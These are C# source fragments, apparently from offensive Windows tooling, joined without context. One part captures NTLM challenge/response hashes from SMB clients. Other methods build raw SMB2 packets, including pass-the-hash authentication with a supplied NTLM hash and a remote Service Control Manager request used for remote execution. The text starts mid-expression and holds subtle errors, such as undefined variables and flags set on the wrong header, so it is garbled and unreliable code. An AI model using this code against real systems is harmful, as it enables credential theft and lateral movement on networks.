(smbCOMSessionSetupAndXRequest.SecurityBlobLength > 0) { if (!BitConverter.ToString(smbCOMSessionSetupAndXRequest.SecurityBlob).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos { NTLMHelper ntlmHelper = new NTLMHelper(smbCOMSessionSetupAndXRequest.SecurityBlob); if (ntlmHelper.Signature.StartsWith("NTLMSSP")) { if (ntlmHelper.MessageType == 3) { NTLMResponse ntlmResponse = new NTLMResponse(smbCOMSessionSetupAndXRequest.SecurityBlob); session = String.Concat(clientIP, ":", clientPort); challenge = Program.smbSessionTable[session]?.ToString(); string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); string user = Encoding.Unicode.GetString(ntlmResponse.UserName); string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); Output.NTLMOutput(user, domain, challenge, response, clientIP, host, "SMB", listenerPort, clientPort, lmResponse); } } } } } } break; } } else if (helper.Protocol[0] == 0xfe) { smb2Header.ReadBytes(data, sessionServiceIndex); string flags = Convert.ToString(BitConverter.ToUInt16(smb2Header.Flags, 0), 2).PadLeft(smb2Header.Flags.Length * 8, '0'); switch (smb2Header.Command) { case 0: { if (String.Equals(flags.Substring(31, 1), "0")) { Output.Queue(String.Format("[.] [{0}] SMB2+({1}) negotiation request detected from {2}:{3}", Output.Timestamp(), listenerPort, clientIP, clientPort)); } } break; case 1: { if (String.Equals(flags.Substring(31, 1), "1")) { SMB2SessionSetupResponse smb2SessionSetupResponse = new SMB2SessionSetupResponse(data, 64 + sessionServiceIndex); if (smb2SessionSetupResponse.SecurityBufferLength > 0) { if (!BitConverter.ToString(smb2SessionSetupResponse.Buffer).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos { NTLMHelper ntlmHelper = new NTLMHelper(smb2SessionSetupResponse.Buffer); if (ntlmHelper.Signature.StartsWith("NTLMSSP")) { if (ntlmHelper.MessageType == 2) { NTLMChallenge ntlmChallenge = new NTLMChallenge(smb2SessionSetupResponse.Buffer); session = BitConverter.ToString(smb2Header.SessionId).Replace("-", ""); challenge = BitConverter.ToString(ntlmChallenge.ServerChallenge).Replace("-", ""); Program.smbSessionTable[session] = challenge; Output.Queue(String.Format("[+] [{0}] SMB({1}) NTLM challenge [{2}] sent to {3}:{4}", Output.Timestamp(), clientPort, challenge, clientIP, listenerPort)); } } } else { Output.Queue(string.Format("[.] [{0}] SMB({1}) Kerberos authentication from {2}:{3}", Output.Timestamp(), clientPort, clientIP, listenerPort)); } } } else { SMB2SessionSetupRequest smb2SessionSetupRequest = new SMB2SessionSetupRequest(data, 64 + sessionServiceIndex); if (smb2SessionSetupRequest.SecurityBufferLength > 0) { if (!BitConverter.ToString(smb2SessionSetupRequest.Buffer).Contains("2A-86-48-86-F7-12-01-02-02")) // kerberos { NTLMHelper ntlmHelper = new NTLMHelper(smb2SessionSetupRequest.Buffer); if (ntlmHelper.Signature.StartsWith("NTLMSSP")) { if (ntlmHelper.MessageType == 3) { NTLMResponse ntlmResponse = new NTLMResponse(smb2SessionSetupRequest.Buffer); session = BitConverter.ToString(smb2Header.SessionId).Replace("-", ""); challenge = Program.smbSessionTable[session]?.ToString(); string domain = Encoding.Unicode.GetString(ntlmResponse.DomainName); string user = Encoding.Unicode.GetString(ntlmResponse.UserName); string host = Encoding.Unicode.GetString(ntlmResponse.Workstation); string response = BitConverter.ToString(ntlmResponse.NtChallengeResponse).Replace("-", ""); string lmResponse = BitConverter.ToString(ntlmResponse.LmChallengeResponse).Replace("-", ""); Output.NTLMOutput(user, domain, challenge, response, clientIP, host, "SMB", listenerPort, clientPort, lmResponse); } } } } } } break; } } } }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal Boolean FindRequest() { treeId = recieve.Skip(40).Take(4).ToArray(); //////////////////////////////////////////////////////////////////////////////// SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x0e, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); header.SetChainOffset(new Byte[] { 0x68, 0x00, 0x00, 0x00 }); SMB2FindFileRequestFile findFileRequestFile = new SMB2FindFileRequestFile(); findFileRequestFile.SetInfoLevel(new Byte[] { 0x25 }); findFileRequestFile.SetFileID(guidFileHandle); findFileRequestFile.SetPadding(new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); Byte[] bData = findFileRequestFile.GetRequest(); if (signing) { header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); //////////////////////////////////////////////////////////////////////////////// SMB2Header header2 = new SMB2Header(); header2.SetCommand(new Byte[] { 0x0e, 0x00 }); header2.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header2.SetMessageID(++messageId); header2.SetProcessID(processId); header2.SetTreeId(treeId); header2.SetSessionID(sessionId); header.SetFlags(new Byte[] { 0x04, 0x00, 0x00, 0x00 }); SMB2FindFileRequestFile findFileRequestFile2 = new SMB2FindFileRequestFile(); findFileRequestFile2.SetInfoLevel(new Byte[] { 0x25 }); findFileRequestFile2.SetFileID(guidFileHandle); findFileRequestFile2.SetPadding(new Byte[] { 0x80, 0x00, 0x00, 0x00 }); Byte[] bData2 = findFileRequestFile2.GetRequest(); if (signing) { header2.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 }); header2.SetSignature(sessionKey, ref bData); } Byte[] bHeader2 = header2.GetHeader(); //////////////////////////////////////////////////////////////////////////////// NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length + bHeader2.Length); sessionService.SetDataLength(bData.Length + bData2.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Combine combine = new Combine(); combine.Extend(bHeader); combine.Extend(bData); combine.Extend(bHeader2); combine.Extend(bData2); Byte[] bSend = Combine.combine(bSessionService, combine.Retrieve()); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); return(GetStatus(recieve.Skip(12).Take(4).ToArray())); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal virtual Boolean ReadRequest() { treeId = recieve.Skip(40).Take(4).ToArray(); //////////////////////////////////////////////////////////////////////////////// SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x05, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SMB2ReadRequest readRequest = new SMB2ReadRequest(); readRequest.SetGuidHandleFile(guidFileHandle); Byte[] bData = readRequest.GetRequest(); header.SetChainOffset(bData.Length); if (signing) { header.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } else { header.SetFlags(new Byte[] { 0x00, 0x00, 0x00, 0x00 }); } Byte[] bHeader = header.GetHeader(); //////////////////////////////////////////////////////////////////////////////// SMB2Header header2 = new SMB2Header(); header2.SetCommand(new Byte[] { 0x0e, 0x00 }); header2.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header2.SetMessageID(++messageId); header2.SetProcessID(processId); header2.SetTreeId(treeId); header2.SetSessionID(sessionId); header2.SetChainOffset(new Byte[] { 0x68, 0x00, 0x00, 0x00 }); SMB2FindFileRequestFile requestFile = new SMB2FindFileRequestFile(); requestFile.SetPadding(new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); Byte[] bData2 = requestFile.GetRequest(); if (signing) { header2.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 }); header2.SetSignature(sessionKey, ref bData2); } else { header2.SetFlags(new Byte[] { 0x04, 0x00, 0x00, 0x00 }); } Byte[] bHeader2 = header2.GetHeader(); //////////////////////////////////////////////////////////////////////////////// SMB2Header header3 = new SMB2Header(); header3.SetCommand(new Byte[] { 0x0e, 0x00 }); header3.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header3.SetMessageID(++messageId); header3.SetProcessID(processId); header3.SetTreeId(treeId); header3.SetSessionID(sessionId); SMB2FindFileRequestFile requestFile2 = new SMB2FindFileRequestFile(); requestFile2.SetOutputBufferLength(new Byte[] { 0x80, 0x00, 0x00, 0x00 }); Byte[] bData3 = requestFile2.GetRequest(); if (signing) { header3.SetFlags(new Byte[] { 0x0c, 0x00, 0x00, 0x00 }); header3.SetSignature(sessionKey, ref bData3); } else { header3.SetFlags(new Byte[] { 0x04, 0x00, 0x00, 0x00 }); } Byte[] bHeader3 = header3.GetHeader(); //////////////////////////////////////////////////////////////////////////////// NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length + bHeader2.Length + bHeader3.Length); sessionService.SetDataLength(bData.Length + bData2.Length + bData3.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); bSend = Combine.combine(bSend, Combine.combine(bHeader2, bData2)); bSend = Combine.combine(bSend, Combine.combine(bHeader3, bData3)); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) return true; else return false; }
internal Boolean OpenSCManagerW() { SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x09, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x01, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); SVCCTLSCMOpenSCManagerW openSCManagerW = new SVCCTLSCMOpenSCManagerW(); Byte[] bSCManager = openSCManagerW.GetRequest(); DCERPCRequest rpcRequest = new DCERPCRequest(); rpcRequest.SetPacketFlags(new Byte[] { 0x03 }); rpcRequest.SetFragLength(bSCManager.Length, 0, 0); rpcRequest.SetCallID(new Byte[] { 0x01, 0x00, 0x00, 0x00 }); rpcRequest.SetContextID(new Byte[] { 0x00, 0x00 }); rpcRequest.SetOpnum(new Byte[] { 0x0f, 0x00 }); Byte[] bRPCRequest = rpcRequest.GetRequest(); SMB2WriteRequest writeRequest = new SMB2WriteRequest(); writeRequest.SetGuidHandleFile(guidFileHandle); writeRequest.SetLength(bRPCRequest.Length + bSCManager.Length); Byte[] bWriteRequest = writeRequest.GetRequest(); Combine combine = new Combine(); combine.Extend(bWriteRequest); combine.Extend(bRPCRequest); combine.Extend(bSCManager); Byte[] bData = combine.Retrieve(); if (signing) { header.SetFlags(new Byte[] { 0x08, 0x00, 0x00, 0x00 }); header.SetSignature(sessionKey, ref bData); } Byte[] bHeader = header.GetHeader(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] bSend = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(bSend, 0, bSend.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) { return(true); } else { return(false); } }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// internal Boolean Authenticate(String domain, String username, String hash) { String NTLMSSP = BitConverter.ToString(recieve).Replace("-", ""); Int32 index = NTLMSSP.IndexOf("4E544C4D53535000") / 2; UInt16 wDomain = BitConverter.ToUInt16(recieve.Skip(index + 12).Take(2).ToArray(), 0); UInt16 wtarget = BitConverter.ToUInt16(recieve.Skip(index + 40).Take(2).ToArray(), 0); sessionId = recieve.Skip(44).Take(8).ToArray(); Byte[] bServerChallenge = recieve.Skip(index + 24).Take(8).ToArray(); Int32 start = index + 56 + wDomain; Int32 end = index + 55 + wDomain + wtarget; Byte[] details = recieve.Skip(start).Take(end - start + 1).ToArray(); Byte[] bTime = details.Skip(details.Length - 12).Take(8).ToArray(); Int32 j = 0; Byte[] bHash = new Byte[hash.Length / 2]; for (Int32 i = 0; i < hash.Length; i += 2) { bHash[j++] = (Byte)((Char)Convert.ToInt16(hash.Substring(i, 2),16)); } Byte[] bHostname = Encoding.Unicode.GetBytes(Environment.MachineName); Byte[] hostnameLength = BitConverter.GetBytes(bHostname.Length).Take(2).ToArray(); Byte[] bDomain = Encoding.Unicode.GetBytes(domain); Byte[] domainLength = BitConverter.GetBytes(bDomain.Length).Take(2).ToArray(); Byte[] bUsername = Encoding.Unicode.GetBytes(username); Byte[] usernameLength = BitConverter.GetBytes(bUsername.Length).Take(2).ToArray(); Byte[] domainOffset = { 0x40, 0x00, 0x00, 0x00 }; Byte[] usernameOffset = BitConverter.GetBytes(bDomain.Length + 64); Byte[] hostnameOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + 64); Byte[] lmOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + 64); Byte[] ntOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + 88); String usernameTarget = username.ToUpper(); Byte[] bUsernameTarget = Encoding.Unicode.GetBytes(usernameTarget); bUsernameTarget = Combine.combine(bUsernameTarget, bDomain); Byte[] NetNTLMv2Hash; using (HMACMD5 hmac = new HMACMD5()) { hmac.Key = bHash; NetNTLMv2Hash = hmac.ComputeHash(bUsernameTarget); } Byte[] bClientChallenge = new Byte[8]; Random random = new Random(); for (Int32 i = 0; i < 8; i++) { bClientChallenge[i] = (Byte)random.Next(0, 255); } Byte[] blob = Combine.combine(new Byte[] { 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }, bTime); blob = Combine.combine(blob, bClientChallenge); blob = Combine.combine(blob, new Byte[] { 0x00, 0x00, 0x00, 0x00 }); blob = Combine.combine(blob, details); blob = Combine.combine(blob, new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); Byte[] bServerChallengeAndBlob = Combine.combine(bServerChallenge, blob); Byte[] NetNTLMv2Response; using (HMACMD5 hmacMD5 = new HMACMD5()) { hmacMD5.Key = NetNTLMv2Hash; NetNTLMv2Response = hmacMD5.ComputeHash(bServerChallengeAndBlob); } if (signing) { using (HMACMD5 hmacMD5 = new HMACMD5()) { hmacMD5.Key = NetNTLMv2Hash; sessionKey = hmacMD5.ComputeHash(NetNTLMv2Response); } } NetNTLMv2Response = Combine.combine(NetNTLMv2Response, blob); Byte[] NetNTLMv2ResponseLength = BitConverter.GetBytes(NetNTLMv2Response.Length).Take(2).ToArray(); Byte[] sessionKeyOffset = BitConverter.GetBytes(bDomain.Length + bUsername.Length + bHostname.Length + NetNTLMv2Response.Length + 88); Byte[] NetNTLMSSPResponse = { 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00 }; NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x18, 0x00 }); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x18, 0x00 }); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, lmOffset); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2ResponseLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2ResponseLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, ntOffset); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, domainOffset); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, usernameOffset); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, hostnameOffset); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyLength); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, sessionKeyOffset); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, flags); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bDomain); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bUsername); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, bHostname); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, new Byte[] { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }); NetNTLMSSPResponse = Combine.combine(NetNTLMSSPResponse, NetNTLMv2Response); SMB2Header header = new SMB2Header(); header.SetCommand(new Byte[] { 0x01, 0x00 }); header.SetCreditsRequested(new Byte[] { 0x1f, 0x00 }); header.SetMessageID(++messageId); header.SetProcessID(processId); header.SetTreeId(treeId); header.SetSessionID(sessionId); Byte[] bHeader = header.GetHeader(); NTLMSSPAuth ntlmSSPAuth = new NTLMSSPAuth(); ntlmSSPAuth.SetNetNTLMResponse(NetNTLMSSPResponse); Byte[] bNTLMSSPAuth = ntlmSSPAuth.GetNTLMSSPAuth(); SMB2SessionSetupRequest sessionSetup = new SMB2SessionSetupRequest(); sessionSetup.SetSecurityBlob(bNTLMSSPAuth); Byte[] bData = sessionSetup.GetSMB2SessionSetupRequest(); NetBIOSSessionService sessionService = new NetBIOSSessionService(); sessionService.SetHeaderLength(bHeader.Length); sessionService.SetDataLength(bData.Length); Byte[] bSessionService = sessionService.GetNetBIOSSessionService(); Byte[] send = Combine.combine(Combine.combine(bSessionService, bHeader), bData); streamSocket.Write(send, 0, send.Length); streamSocket.Flush(); streamSocket.Read(recieve, 0, recieve.Length); if (GetStatus(recieve.Skip(12).Take(4).ToArray())) { Console.WriteLine("[+] Login Successful"); return true; } else return false; }